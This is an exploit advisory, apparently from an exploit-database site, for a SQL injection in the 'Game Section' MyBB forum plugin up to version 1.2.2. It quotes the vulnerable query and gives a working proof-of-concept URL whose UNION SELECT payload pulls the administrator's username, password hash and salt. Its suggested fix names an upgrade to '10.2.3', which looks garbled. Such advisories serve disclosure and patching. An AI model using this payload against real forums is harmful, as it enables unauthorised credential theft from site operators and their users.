MyBB plugin Game Section <= 1.2.2 SQL injection

Download | Vote Up (0) | Vote Down (0)

# Exploit Title: MyBB plugin Game Section <= 1.2.2 SQL injection
# Date: 13/08/2013
# Exploit Author: Groucho
# Vendor Homepage: http://mods.mybb.com/view/game-section
# Version: 1.2.2
# Tested on: Debian

Introduction
============

Game section is a MyBB plugin which let you create a whole section of flash games inside of your myBB forum.
Unfortunately, it's vulnerable to a SQL injection.

SQL injection
=============

--------------------[inc/plugins/games.php]-------------------------
L 651 

1$query = $db->query("SELECT * FROM ".TABLE_PREFIX."games WHERE title LIKE '%".$title."%' AND active='1' ORDER BY title ASC");

--------------------[inc/plugins/games.php]-------------------------
$title variable directly comes from an user input.

PoC :

http://[site]/[path]/xmlhttp.php?action=games_search&title=' union select 1,2,concat(username, 0x3a, password, 0x3a, salt),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from mybb_users WHERE uid=1-- -

Solution
========

Upgrade to the 10.2.3 version.

Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://hwc-crew.org/

Groucho

Be the first to give feedback !
Please login to comment !